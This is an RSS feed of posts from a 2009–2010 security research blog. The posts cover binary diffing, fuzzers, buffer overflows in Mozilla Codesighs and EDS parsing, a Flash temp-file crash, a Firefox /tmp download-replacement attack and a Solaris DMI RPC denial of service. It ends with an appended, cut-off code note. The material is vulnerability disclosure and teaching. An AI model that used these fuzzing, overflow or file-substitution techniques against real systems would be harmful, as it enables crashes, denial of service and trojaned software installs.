<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
<item><title>What did they fix?</title><description>2010-05-25 00:54:32 - Jeremy's Computer Security Blog : Nearly every day a security advisory is published for some vendor's product. Depending on who publishes the advisories, they may contain few or even no technical details describing what was changed from one version of the software to the next. DarunGrim2 is a free binary diffing tool by Jeongwook Oh. It uses IDA Database files (.idb) to analyze and compare two binaries and implements several algorithms to improve the overall analysis. So if you want to know exactly what issue(s) were supposedly fixed in the next version of the software, DarunGrim2 can help. When you download DarunGrim2 from the website, be sure to read the Usage.

For a brief demonstration, I've given DarunGrim2 two untouched IDBs (no variables or functions renamed, etc.) from two binaries referred to as "Original" and "Patched". Original (left) contains the vulnerability, while Patched (right) includes the fix. We see to the far right "Match Rate". This simply shows what percentage of the function's code from Original to Patched is the same. In more complex binaries, if very little code is changed to fix the vulnerability and no other significant changes were made, the Match Rate should be slightly less than 100%. But since this binary is very small, 50% is reasonable for a patch. sub_4012E5 is clearly unmatched across Original and Patched, so let's check it out. Carefully read the disassembly. What is the difference?

ORIGINAL:
mov     eax, [ebp+arg_0]
mov     [esp], eax      ; char *
call    strlen          ; calls strlen() for the argument to the function

PATCHED:
lea     eax, [ebp+var_28]
mov     [esp], eax      ; char *
call    strlen          ; calls strlen() for a local variable in the function

sub_40132A passes its three arguments, which came from sub_4012E5, to memcpy():
mov     eax, [ebp+arg_8]
mov     [esp+8], eax    ; size_t

strlen() returns a size_t for memcpy(), telling it to copy n bytes from src. Earlier, when the strlen() for Original was called, it became the size of the src (arg_0) to the function. But when the strlen() for Patched was called, it became the size of the dest (var_28). The code looks similar to this for Original: memcpy(var_28, arg_0, strlen(arg_0)); and something like this for Patched: memcpy(var_28, arg_0, strlen(var_28));

So, what did they fix? A buffer overflow vulnerability. In the original, if more data than the local variable can hold is passed via the argument, memory could be corrupted. This is patched by using the size of the local variable to dictate the amount of data to copy into the local variable, instead of using the size of the argument. Isn't binary diffing fun?</description><link>http://www.secuobs.com/revue/news/225190.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/225190.shtml</guid></item>
<item><title>Adobe Flash Temporary Filename Scheme</title><description>Secuobs.com : 2010-03-05 05:39:22 - Jeremy's Computer Security Blog - Today, I received this from Adobe PSIRT: "We are targeting May for the next release of Flash Player, which would include the fix for this issue. We will provide more information as we get confirmation of the schedule and any other helpful details." Going on 6 months and they still can't seem to check if mkstemp() returns -1. I know this isn't really even a security issue, and it costs money to do things like this in business, but really, they could have handled it a lot better. I'll go into some detail now.

I was watching some flash video on Vimeo and then happened to ls my /tmp directory. Catching my eye was a certain filename or two, with names such as "Flash7f9Lk3" and "Flashm10PDtY". I soon figured out that when viewing flash videos on Firefox with the Adobe Flash Player 10 plug-in, as buffered, a copy of the video is downloaded to /tmp with the first part of the filename always being "Flash" and the last part being six random case-sensitive alphanumeric characters: a-z (26) + A-Z (26) + 0-9 (10) = 62; 62^6 = 56,800,235,584. So there are ~56 billion different filenames that can be chosen in this scheme. We see here they use mkstemp() to create the temporary files. The code looks something like this:

strcpy(filename, "/tmp/FlashXXXXXX");
i = mkstemp(filename);
if (i) { ... }

Hmmm. They check if mkstemp() returns an open file descriptor, but what if it returns -1?

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7d1f6d0 (LWP 27117)]
0xaafab279 in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
(gdb) i r
eax            0x1e      30
ecx            0x76656c5f        1986358367
edx            0xaa80b000        -1434406912
ebx            0xab725210        -1418571248
esp            0xbf8f53e0        0xbf8f53e0
ebp            0xbf8f5408        0xbf8f5408
esi            0xcf79974 217553268
edi            0xcf79958 217553240
eip            0xaafab279        0xaafab279
eflags         0x10206   [ PF IF RF ]
cs             0x73      115
ss             0x7b      123
ds             0x7b      123
es             0x7b      123
fs             0x0       0
gs             0x33      51
(gdb) x/i $eip
0xaafab279:     mov    (%ecx),%eax
(gdb) bt
#0  0xaafab279 in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#1  0xaafab44d in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#2  0xab1990a0 in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#3  0xab1a2ed5 in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#4  0xab1104c0 in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#5  0xab1a4f6e in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#6  0xaadb4565 in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#7  0xaadb7cc3 in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#8  0xb77cb3bd in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#9  0xb77cc6a0 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#10 0xb77cac57 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#11 0xb77d3004 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#12 0xb77cd1fd in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#13 0xb79514d1 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#14 0xb795130a in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#15 0xb7275367 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#16 0xb72800c9 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#17 0xb79856c8 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#18 0xb7955fea in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#19 0xb78d8eb6 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#20 0xb78c3db8 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#21 0xb6bc7dad in ?? () from /usr/lib/libglib-2.0.so.0
#22 0xb6b90b88 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#23 0xb6b940eb in ?? () from /usr/lib/libglib-2.0.so.0
#24 0xb6b94268 in g_main_context_iteration () from /usr/lib/libglib-2.0.so.0
#25 0xb67c9634 in gtk_main_iteration () from /usr/lib/libgtk-x11-2.0.so.0
#26 0xaadbab17 in ?? () from /usr/lib/adobe-flashplugin/libflashplayer.so
#27 0xb6b912b6 in ?? () from /usr/lib/libglib-2.0.so.0
#28 0xb6b90b88 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#29 0xb6b940eb in ?? () from /usr/lib/libglib-2.0.so.0
#30 0xb6b94268 in g_main_context_iteration () from /usr/lib/libglib-2.0.so.0
#31 0xb78c39e4 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#32 0xb78d8b58 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#33 0xb78d8cef in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#34 0xb798566a in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#35 0xb7955f54 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#36 0xb78d8e38 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#37 0xb776d2b4 in ?? () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#38 0xb71caa8b in XRE_main () from /usr/lib/xulrunner-1.9.0.14/libxul.so
#39 0x080491ab in ?? ()
#40 0xb7d37775 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#41 0x08048d11 in ?? ()
(gdb)

EEXIST anyone? You don't need to create ~56 billion yourself either, just a few million should work fine. I contacted Adobe on 09/18/2009, exchanged a few emails, one of interest being: "Resolving this issue requires some architectural changes that are not appropriate for a security patch." Even if it's not much of a security issue, but an interesting programming mistake, a local user can still crash anyone else's Firefox process that is using the Adobe Flash plug-in. And then they say they want more time. Waiting 8 months for them to check the return value of mkstemp() is unacceptable. Proof of concept? That should be easy (hint: write your own scheme or try looping mkstemp()).</description><link>http://www.secuobs.com/revue/news/198263.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/198263.shtml</guid></item>
<item><title>Reverse Engineering File Formats</title><description>Secuobs.com : 2010-02-10 03:18:45 - Jeremy's Computer Security Blog - The target application parses data from an EDS file format. We have no sample EDS file, and no idea what the file format looks like. But soon you will see that by blackbox testing and reverse engineering, we can get all the information we need to correctly produce EDS files and find vulnerabilities.

First off, let's just throw some data into the file test.eds, load it into the application and see how it responds. From the error message, we can see that it needs the data in []'s (load data). Now we know an EDS file also contains [Device] and [File] sections (load data). Really, how lucky can we get? 'VendCode', 'ProdType', 'ProdCode', 'MajRev', 'MinRev' are entries for the [Device] section and 'Revision' is an entry under the [File] section. So far, using blackbox testing, we have discovered lots of information about the EDS file format. But usually there is more to discover. It's time to reverse it.

---- [Device]
---- [File]

Looks like there is another entry for the [File] section called 'DescText' and we see how to correctly format it in the EDS file. A closer look reveals a call to wsprintf() on the 'DescText' entry, which can lead to a buffer overflow. So, let's use the format to write the entry, attach a debugger and see what happens. Yeah! Hm, we probably didn't expect a unicode buffer overflow. How did that happen anyways?

sub_1000FB50 -- calls sub_10007160
sub_10007160 -- vulnerable function

In sub_1000FB50, we see a call to MultiByteToWideChar() (maps a character string to a wide-character (Unicode) string). So, in conclusion, we just went from knowing absolutely nothing about the EDS file format to knowing exactly how to build a valid EDS file, the sections and entries it parses, and which ones may be vulnerable to attack.</description><link>http://www.secuobs.com/revue/news/190305.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/190305.shtml</guid></item>
<item><title>Browser Fuzzer 3</title><description>Secuobs.com : 2010-01-16 18:22:45 - Jeremy's Computer Security Blog - Browser Fuzzer 3, or bf3, is a comprehensive web browser fuzzer. Browser Fuzzer 3 is designed as a hybrid framework/standalone fuzzer: the modules it uses are extendable but also highly integrated into the core. bf3 can be used via command line to set all necessary flags for each fuzzing operation. After initialization, bf3 creates test cases in a numbered system. Fuzzing is automated through the browser using the refresh method. If an error is detected, server logs can provide insight into the offending test case.

- Fuzzes CSS, DOM, HTML, JavaScript and XML
- Attended and Unattended Fuzzing Modes
- 7th Generation Fuzzing Oracle
- Random Data Generator
- Mutation Fuzzing Engine

USAGE: ./bf3 [-Z] [-X file.ext] [-x extra.html] [-P /www]
INFO: [-T Fuzzing Oracle] [-D Modules Available]
 -M  target module
 -A  attended fuzzing mode (dom/js only)
 -U  unattended fuzzing mode
 -O  use the fuzzing oracle
 -R  use random generation
 -Z  max number of bytes (random generation)
 -X  file to parse for mutation
 -x  extra file for mutation (css/xml only)
 -P  test case output directory (full path)
 -T  list fuzzing oracle
 -D  list modules available

Modules Available:
 1  Cascading Style Sheets (CSS)
 2  Document Object Model (DOM)
 3  HyperText Markup Language (HTML)
 4  JavaScript (JS)
 5  Extensible Markup Language (XML)

Example Usage:

Fuzz JavaScript in Unattended Mode with the Fuzzing Oracle and output test cases to /var/www:
./bf3 -M 3 -U -O -P /var/www

Fuzz DOM in Attended Mode with Random Data up to 10,000 bytes and output 10,000 test cases to /var/www/dom:
./bf3 -M 2 -A -R 10000 -Z 10000 -P /var/www/dom

Fuzz CSS by mutating file.css with Random Data up to 100,000 bytes (default) and use file.html to display the data, output to /var/www/cssm (total number of test cases = 100 x number of characters in file.css):
./bf3 -M 1 -U -R 100 -X /home/linux/bf3/samples/css/style.css -x /home/linux/bf3/samples/css/bmgsec.html -P /www/css

Fuzz JavaScript in Unattended Mode by generating 1,000,000 random test cases and output to /var/www/js:
./bf3 -M 4 -U -R 1000000 -P /var/www/js

Fuzz XML in Unattended Mode with Random data and output 100,000 test cases to /var/www/xml:
./bf3 -M 5 -U -R 100000 -P /var/www/xml

If you notice an anomaly in the target while processing test cases and you have access to the logs at the server which is hosting them, you can do this to figure out which one you need to save and further research:

fuzz@linux:~$ grep -i chrome /var/log/apache2/access.log | tail -1
10.10.11.11 - - [09/Jan/2010:09:54:54 -0500] "GET /xml1/xml334761.html HTTP/1.1" 200 756 "http://10.10.11.10/xml1/xml334760.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0"

Misc Notes: Attended mode fuzzes things that may need attention (a click of the mouse, etc.) like JS alert() and prompt(). During all fuzzing generation except mutation, -R = # of test cases. During mutation, # of test cases is (-R) x number of characters in the target file. Make sure you remove any data that would conflict with the automated fuzzing process in the extra file when using mutation. When mutation fuzzing XML, you must make sure the xml variable's name is "Document". Please replace the var in the extra file with "Document" to make things work correctly. This could be the first project to go from C (bf) to PERL (bf2) and back to C again (bf3). Krakow Labs Development for binary, source code, demonstration video and more.</description><link>http://www.secuobs.com/revue/news/182420.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/182420.shtml</guid></item>
<item><title>Writing Code that Breaks Code</title><description>Secuobs.com : 2009-12-15 01:09:32 - Jeremy's Computer Security Blog - Fuzzing is targeting input and delivering data that is handled by a target with the intent of finding bugs.

#!/usr/bin/perl
use IO::Socket;
use String::Random;
while (1) {
    # connect to the target service (TCP here; swap Proto for 'udp' to fuzz a UDP service)
    $sock = IO::Socket::INET->new(Proto => 'tcp', PeerHost => 'localhost', PeerPort => 4444) or die "connection failed";
    $rand = new String::Random;
    # random length (0-99) of random printable characters, terminated like an HTTP request
    $random = $rand->randpattern("." x rand(100)) . "\r\n\r\n";
    $sock->send($random);
    close($sock);
}

A simple, protocol-less, remote fuzzer in only 11 lines of Perl. It works by connecting to the host on a specified port, via TCP or UDP, and sending random lengths of random characters in an infinite loop until the service stops responding. With bare modification, this code can check for many types of vulnerabilities in just about any server that accepts input. A few more lines could add a user interface, specifications for more target input, logging functionality, and more.</description><link>http://www.secuobs.com/revue/news/171898.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/171898.shtml</guid></item>
<item><title>Mozilla Code(sighs)</title><description>Secuobs.com : 2009-12-12 09:53:01 - Jeremy's Computer Security Blog - I reported a memory corruption vulnerability in Mozilla Codesighs, a "set of tools to help you determine the code and data size of shared libraries and executables. Once you can measure the code and data size, then you can measure drifts in size as code changes occur." Mozilla Codesighs is included as third party in Google's Chrome (dev pkg), Google's Gadget for Linux, and probably others. I didn't expect them to jump right on it since it's not for Firefox or Thunderbird, but I did figure they'd let me know that they would get around to it eventually.

"this is a debugging tool used in specific situations, to read as input output generated by other programs. So even if it crashes in response to some other input, I don't see how that's a vulnerability. This tool is not designed to handle arbitrary input, nor does it need to be."

Seems like Mozilla is not interested.

int codesighs(Options* inOptions)
/*
** Output a simplistic report based on our options.
*/
{
    int retval = 0;
    char lineBuffer[0x500];
    int scanRes = 0;
    unsigned long size;
    char segClass[0x10];
    char scope[0x10];
    char module[0x100];
    char segment[0x40];
    char object[0x100];
    char* symbol;
    SizeStats overall;
    ModuleStats* modules = NULL;
    unsigned moduleCount = 0;

    memset(&amp;overall, 0, sizeof(overall));

    /*
    ** Read the file line by line, regardless of number of fields.
    ** We assume tab separated value formatting, at least 7 lead values:
    **  size class scope module segment object symbol
    */
    while(0 == retval &amp;&amp; NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput))
    {
        trimWhite(lineBuffer);

        scanRes = sscanf(lineBuffer,
            "%x\t%s\t%s\t%s\t%s\t%s\t",
            (unsigned*)&amp;size,
            segClass,
            scope,
            module,
            segment,
            object);

The vulnerability is introduced in the sscanf() call, where the developer's code dangerously copies data into buffers without a width specifier, allowing us to overflow 5 different buffers. Some technical details via GDB:

257         while(0 == retval &amp;&amp; NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput))
(gdb)
259             trimWhite(lineBuffer);
(gdb)
trimWhite (inString=0xbfffd310 "1\tCODE\t", 'A' &lt;repeats ... times&gt;, "\t", 'A' &lt;repeats ... times&gt;, "\t", 'A' &lt;repeats ... times&gt;, "\t", 'A' &lt;repeats ... times&gt;) at codesighs.c:213
213         int len = strlen(inString);
(gdb)
215         while(len)
(gdb)
217             len--;
(gdb)
219             if(isspace(inString[len]))
(gdb)
221                 inString[len] = '\0';
(gdb)
215         while(len)
(gdb)
217             len--;
(gdb)
219             if(isspace(inString[len]))
(gdb)
228     }
(gdb)
codesighs (inOptions=0xbffff350) at codesighs.c:261
261             scanRes = sscanf(lineBuffer,
(gdb) i r
eax            0x0       0
ecx            0xb7fe468c        -1208072564
edx            0x82      130
ebx            0x9d8ff4  10326004
esp            0xbfffd040        0xbfffd040
ebp            0xbffff328        0xbffff328
esi            0x0       0
edi            0x0       0
eip            0x8048945 0x8048945
eflags         0x246     [ PF ZF IF ]
cs             0x73      115
ss             0x7b      123
ds             0x7b      123
es             0x7b      123
fs             0x0       0
gs             0x33      51
(gdb) s
270             if(6 == scanRes)
(gdb) i r
eax            0x6       6
ecx            0x414141  4276545
edx            0x0       0
ebx            0x9d8ff4  10326004
esp            0xbfffd040        0xbfffd040
ebp            0xbffff328        0xbffff328
esi            0x0       0
edi            0x0       0
eip            0x804899d 0x804899d
eflags         0x282     [ SF IF ]
cs             0x73      115
ss             0x7b      123
ds             0x7b      123
es             0x7b      123
fs             0x0       0
gs             0x33      51
(gdb)

An attacker could give someone a file to parse with Codesighs and it will corrupt memory with the possibility of executing code on their system. That is in fact a vulnerability. ONE DAY after I filed the bug report, they unmarked it as a security issue. So I guess they wouldn't mind if I blogged about it and let others investigate with this code.</description><link>http://www.secuobs.com/revue/news/171312.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/171312.shtml</guid></item>
<item><title>From Static Analysis to 0day Exploit</title><description>Secuobs.com : 2009-12-08 23:51:22 - Jeremy's Computer Security Blog - Back in September, I finished a presentation I planned on submitting for SecurityTubeCon titled "From Static Analysis to 0day Exploit". But SecurityTubeCon never happened. So, there I was with a full 20 minute presentation and no conference to show it. But after some twittering and skypeing, Marcus from DojoSec decided to pick it up, and it worked out. Big thanks to Marcus and DojoSec!

Abstract: This presentation features a great static analysis tool called Klocwork Insight. Static analysis is the analysis of either source or object code from a project. This project could be software or firmware, binary or source. Static analysis is performed without actually executing the code; it just gets analyzed. Klocwork Insight is a source code analysis suite that is used to audit source code of projects written in C, C++, C#, and even Java. It is used to detect security and quality issues by analyzing the project's source code for bugs. By the end of the video, you will have learned how to use Klocwork Insight to find vulnerabilities in software and also preview a live 0day exploit in the target audited software. Click here for the full presentation. I also released a small 0day to go along with the presentation.</description><link>http://www.secuobs.com/revue/news/169886.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/169886.shtml</guid></item>
<item><title>Some vendors are 'unconcerned'</title><description>Secuobs.com : 2009-11-21 01:29:07 - Jeremy's Computer Security Blog - Around 10 months ago, I was fuzzing with my ftp client fuzzer (unreleased). I came across Robo-FTP, which provides client and server solutions for FTP. "The Robo-FTP Product Suite: The most powerful, secure and flexible tool for automated file transfers and related workflow management." At least their marketing people did a good job :) So after I explored the software a little bit, I decided to start fuzzing. I saved the server login information on Robo-FTP and started the fuzzer listening on port 2121. Logon. In the console box I see "220" and it just stops there. I hit Exit and it took me back to the main application. I clicked on "Tools" again, but I couldn't "Run FTP Client Applet" anymore. That's weird. Then I exited Robo-FTP.

Robo-FTP.exe - The instruction at 0x7C9102F6 referenced memory at 0x41414140. The memory could not be read. (0x7C9102F6 - 0x41414140)

I contacted Robo-FTP about this vulnerability and they said something to the effect of 'they would look into it' and they appreciated my concern. I haven't heard anything from them since. A few days ago, I started thinking about this bug again and wondered if they ever fixed it. After checking their website I saw the latest version (3.6.17) had been released November 2nd. I downloaded the new version, ran the fuzzer and connected again. The bug was never fixed. Not that this is surprising to me, but it may be to others that use and rely on this product.</description><link>http://www.secuobs.com/revue/news/163656.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/163656.shtml</guid></item>
<item><title>Firefox Local Download Manager Vulnerability</title><description>Secuobs.com : 2009-10-28 22:36:46 - Jeremy's Computer Security Blog - A video demonstrating exploitation of this vulnerability is available here. Now for the technical details.

When downloading files through Firefox and choosing the "Open with" option, Firefox will create a temporary file in the form of RANDOM.part (RANDOM is random alphanumeric characters and .part is the extension). When the download completes, Firefox saves the completed file in the /tmp directory as its original filename and opens it with the program's handler (for example, Ark for compressed archives, VLC for mp3, WINE for exe, etc.). Now, what if there is already a file with an identical filename in the temporary file directory? Firefox uses the scheme of saving and opening the completed download as /tmp/file-#.zip, where "file" is the file's name, "-#" is a dash and the next available number in order, and ".zip" is of course the file's extension. So if /tmp/file.zip already exists and the user tries to download a file with the same name, Firefox saves and opens the newly downloaded file as /tmp/file-1.zip. That scheme looked suspicious to me, and raised a couple of good questions:

1) What is the maximum number in the filename?
2) What happens when it reaches that maximum number?

Testing has proved that 9999, for example /tmp/file-9999.zip, is the maximum number Firefox will use to deal with identical "Open with" filenames. Instead of using /tmp/file-10000.zip, Firefox will just use the original identical file instead of the one it was supposed to download and open. That can get dangerous when local users can write to /tmp just like everybody else.

To exploit this situation, we need to know the filename that will be downloaded ahead of time. Then it is just a matter of creating the excess files, placing our "replacement" file (with the identical filename) in /tmp, and waiting for the target user to use the "Open with" option to download a file. A file of our choosing will appear in the download history (as a "ghost pointer", one mozilla guy noted). If the file doesn't automatically open (as most testing shows), then the average user is going to simply double click on the pointer in history anyways, opening our replacement file. We wouldn't even necessarily have to know "ahead of time". Depending on how long it would take to complete the download (remember Firefox is writing to /tmp/RANDOM.part until it's finished downloading), we could do our business while the file is still downloading (again, as long as we know its filename). There are many scenarios where we could leverage this vulnerability; here is one example:

- Administrator is downloading openssh-5.2.tar.gz
- We run the exploit to replace openssh-5.2.tar.gz with a modified version
- Administrator installs our OpenSSH 5.2 with our _modifications_

The download history will still show the name of the site that supplied the original file and the original filename even when the target user opened our replacement file instead.

Conditions that have to be met for exploitation to succeed:
1. The ability to write in the temporary file directory, /tmp by default on Linux (shell, ftp, etc. with write permissions could be helpful for making this work remotely).
2. The target user chooses to download the file and chooses the "Open with" preference.
3. The target user also has to double click the file in the download manager (in previous testing, if I recall correctly, the file opened automatically, as normal behavior, but that can no longer be confirmed).

Firefox on Windows has slightly different results. I found during testing that when the download completes, the right file will be opened. Although unreliable, we were able to get the history of the file in download manager to show the replacement file and it will be opened if the user chooses to open it from there. Exploitation on Windows would be limited anyways due to the fact that you don't usually see as much remote access to do local things on Windows as is fairly common on Linux. On Linux it is also common for the replacement file to be kept in history when using this exploit, which can be useful for helping play off the exploit when you don't want the target to think anything much is out of the ordinary.

mozilla-1.9.1/xpcom/io/nsLocalFileCommon.cpp - LINES: 85-174

NS_IMETHODIMP
nsLocalFile::CreateUnique(PRUint32 type, PRUint32 attributes)
{
    nsresult rv;
    PRBool longName;

#ifdef XP_WIN
    nsAutoString pathName, leafName, rootName, suffix;
    rv = GetPath(pathName);
#else
    nsCAutoString pathName, leafName, rootName, suffix;
    rv = GetNativePath(pathName);
#endif
    if (NS_FAILED(rv))
        return rv;

    longName = (pathName.Length() + kMaxSequenceNumberLength > kMaxFilenameLength);
    if (!longName)
    {
        rv = Create(type, attributes);
        if (rv != NS_ERROR_FILE_ALREADY_EXISTS)
            return rv;
    }

#ifdef XP_WIN
    rv = GetLeafName(leafName);
    if (NS_FAILED(rv))
        return rv;

    const PRInt32 lastDot = leafName.RFindChar(PRUnichar('.'));
#else
    rv = GetNativeLeafName(leafName);
    if (NS_FAILED(rv))
        return rv;

    const PRInt32 lastDot = leafName.RFindChar('.');
#endif

    if (lastDot == kNotFound)
    {
        rootName = leafName;
    }
    else
    {
        suffix = Substring(leafName, lastDot);      // include '.'
        rootName = Substring(leafName, 0, lastDot); // strip suffix and dot
    }

    if (longName)
    {
        PRUint32 maxRootLength = (kMaxFilenameLength -
                                  (pathName.Length() - leafName.Length()) -
                                  suffix.Length() - kMaxSequenceNumberLength);
#ifdef XP_WIN
        // ensure that we don't cut the name in mid-UTF16-character
        rootName.SetLength(NS_IS_LOW_SURROGATE(rootName[maxRootLength]) ?
                           maxRootLength - 1 : maxRootLength);
        SetLeafName(rootName + suffix);
#else
        if (NS_IsNativeUTF8())
            // ensure that we don't cut the name in mid-UTF8-character
            while (UTF8traits::isInSeq(rootName[maxRootLength]))
                --maxRootLength;
        rootName.SetLength(maxRootLength);
        SetNativeLeafName(rootName + suffix);
#endif
        nsresult rv = Create(type, attributes);
        if (rv != NS_ERROR_FILE_ALREADY_EXISTS)
            return rv;
    }

    for (int indx = 1; indx &lt; 10000; indx++)
    {
        // start with "Picture-1.jpg" after "Picture.jpg" exists
#ifdef XP_WIN
        SetLeafName(rootName +
                    NS_ConvertASCIItoUTF16(nsPrintfCString("-%d", indx)) +
                    suffix);
#else
        SetNativeLeafName(rootName + nsPrintfCString("-%d", indx) + suffix);
#endif
        rv = Create(type, attributes);
        if (NS_SUCCEEDED(rv) || rv != NS_ERROR_FILE_ALREADY_EXISTS)
            return rv;
    }

    // The disk is full, sort of
    return NS_ERROR_FILE_TOO_BIG;
}

That code gives us a good look at how the scheme works. I tested the "Save As" option and it doesn't seem to be vulnerable (it saved, for example, file(1000000).zip). Yes, the header is roughly 3 times as many lines as the actual exploit code, but hey, this bug has a lot of details and ideas but is also very simple to exploit.

linux@ubuntu:~$ ./getunique right.zip /home/linux/Desktop/wrong.zip

(target downloads right.zip and opens it: the same filename, but with wrong.zip's contents) Muy Bueno! Thunderbird doesn't seem to respond, by not responding to the open, when running the exploit. This code looks like it's shared across Mozilla's codebase, so other applications like the SeaMonkey suite may be vulnerable as well. Mozilla also seems to handle certain file types like .tar.gz and .tar.bz2 differently; see the code for more information. You may even have to double click the file's entry in download manager if Firefox doesn't automatically open it. One way or another, though, this vulnerability is decently reliable, on Linux at least. Mozilla has released updates fixing this vulnerability. Full exploit code will be made public soon.</description><link>http://www.secuobs.com/revue/news/155000.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/155000.shtml</guid></item>
<item><title>Desktop Management Interface (DMI)</title><description>Secuobs.com : 2009-09-26 00:56:13 - Jeremy's Computer Security Blog - Anyone scanning a Sun Solaris box for RPC services can usually expect a number of them to be running and available. Some of the services, such as status or rquotad, are well documented and well known, so researching their purpose and functions is trivial. But writing client operations for some programs is harder than for others; DMI is one of those.

DMI stands for Desktop Management Interface, a specification that establishes a framework for communication between management software and managed components. DMI can be used locally or remotely through RPC and is mappable to other management protocols such as SNMP. DMI has four components:

1. MIF (Management Information Format): describes management information.
2. SP (Service Provider): connects the management software and the managed components.
3. CI (Component Interface): API that enables a component to be managed.
4. MI (Management Interface): API used to manage components.

A couple of RPC services that employ DMI on Solaris are dmispd and snmpXdmid. For a description of dmispd, I will quote from its man page:

"The DMI Service Provider, dmispd, is the core of the DMI solution. Management applications and component instrumentations communicate with each other through the Service Provider. The Service Provider coordinates and arbitrates requests from the management application to the specified component instrumentations. The Service Provider handles runtime management of the Component Interface (CI) and the Management Interface (MI), including component installation, registration at the MI and CI level, request serialization and synchronization, event handling for CI, and general flow control and housekeeping."

And the same for snmpXdmid:

"The snmpXdmid utility is a subagent in the Solstice Enterprise Agent Desktop Management Interface package. It maps the SNMP requests forwarded by the Master Agent, snmpdx(1M), into one or more equivalent DMI requests. Further, it remaps the DMI response into an SNMP response back to snmpdx."

When I was writing modules for dmispd and snmpXdmid in my RPC fuzzer, I couldn't find much documentation, so I had to gather information from various resources and put it all together. I'd like to thank the open source developers whose code was so helpful too. Researching the protocols and using the information I found enabled me to write the modules and fuzz dmispd and snmpXdmid.

dmispd program number: 300598
dmispd program version: 1
dmispd procedures:
REGISTER              512
UNREGISTER            513
GETVERSION            514
GETCONFIG             515
SETCONFIG             516
LISTCOMPONENTS        517
LISTCOMPONENTSBYCLASS 518
LISTLANGUAGES         519
LISTCLASSNAMES        520
LISTGROUPS            521
LISTATTRIBUTES        522
ADDROW                523
DELETEROW             524
GETMULTIPLE           525
SETMULTIPLE           526
ADDCOMPONENT          527
ADDLANGUAGE           528
ADDGROUP              529
DELETECOMPONENT       530
DELETELANGUAGE        531
DELETEGROUP           532
GETATTRIBUTE          533
SETATTRIBUTE          534

Rather odd procedure call numbers; they are usually in lower ranges like 1-5.

snmpXdmid program number: 100249
snmpXdmid program version: 1
snmpXdmid procedures:
DELIVEREVENT 256
ADDCOMPONENT 257
UNKNOWN      258
UNKNOWN      259
UNKNOWN      260
UNKNOWN      261
UNKNOWN      262
UNKNOWN      263

UNKNOWN procedures are those for which I couldn't find names.

During fuzzing, I found an issue that is reproducible in both dmispd and snmpXdmid and allows a remote user to consume resources on the whole system. Calling ADDROW and sending data to dmispd (in a loop or not, it doesn't matter) causes the process to consume resources and temporarily "freeze" the system. DELETEROW and DELETELANGUAGE have the same issue. You can check out camisado.c if you are interested. snmpXdmid suffers from the same issue with ADDCOMPONENT and all the other procedures that are valid and that I have tested. If you'd like to test snmpXdmid, just reuse the code for dmispd.

This issue is nothing special, but I figure the code and research could help others that are interested in DMI, RPC, and security. Plus I like seeing code do unexpected or unintended things. If you happen to see any errors or have more information on DMI and DMI-related research, I would appreciate it if you would let me know. I try to make sure all information is as accurate as possible, but mistakes can happen from time to time.</description><link>http://www.secuobs.com/revue/news/144634.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/144634.shtml</guid></item>
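<![CDATA[
The ONC RPC framing that those dmispd procedure numbers ride on, as an added example that is not part of the original post and is not the author's camisado.c: it packs the RPC v2 call header (RFC 5531) for program 300598, version 1, procedure ADDROW (523), builds the portmapper GETPORT request a client sends first to learn dmispd's port, and checks a reply header. The ADDROW argument body is treated as one opaque byte string, which is an assumption about how a fuzzer drives the call and not DMI's real argument structure; the function names are mine, and sending the buffers is left to the caller.

```c
/* Added example: ONC RPC v2 call/reply framing for the dmispd procedures
 * above (RFC 5531).  Not from the post; function names and the opaque
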